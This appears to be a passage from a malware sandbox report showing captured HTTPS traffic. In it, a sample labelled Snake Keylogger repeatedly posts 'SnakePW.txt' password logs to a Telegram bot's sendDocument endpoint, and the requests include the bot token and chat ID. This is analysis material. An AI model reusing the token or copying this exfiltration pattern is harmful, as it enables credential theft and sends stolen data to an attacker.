                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:17 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:17 UTC386INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67006,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228857,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            229192.168.2.550140149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:17 UTC386OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570f537ed5
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:17 UTC387OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 66 35 33 37 65 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570f537ed5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:17 UTC387INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:17 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:17 UTC387INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67007,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228857,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            23192.168.2.549791149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:47 UTC38OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d9e4fdfa
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:47 UTC39OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 39 65 34 66 64 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d9e4fdfaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:48 UTC39INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:48 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:48 UTC40INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66770,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228768,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            230192.168.2.550141149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:17 UTC388OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570f8a5578
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:17 UTC388OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 66 38 61 35 35 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570f8a5578Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:18 UTC389INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:18 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:18 UTC389INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67008,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228858,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            231192.168.2.550142149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:18 UTC390OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570fcd1726
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:18 UTC390OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 66 63 64 31 37 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570fcd1726Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:18 UTC390INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:18 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:18 UTC391INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67009,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228858,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            232192.168.2.550143149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:18 UTC391OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571003ec9f
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:18 UTC392OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 30 30 33 65 63 39 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571003ec9fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:18 UTC392INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:18 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:18 UTC392INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67010,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228858,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            233192.168.2.550144149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:18 UTC393OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757103f87eb
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:18 UTC393OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 30 33 66 38 37 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757103f87ebContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:19 UTC394INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:19 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:19 UTC394INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67012,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228859,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            234192.168.2.550145149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:19 UTC395OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575710765e06
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:19 UTC395OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 30 37 36 35 65 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575710765e06Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:19 UTC395INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:19 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:19 UTC396INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
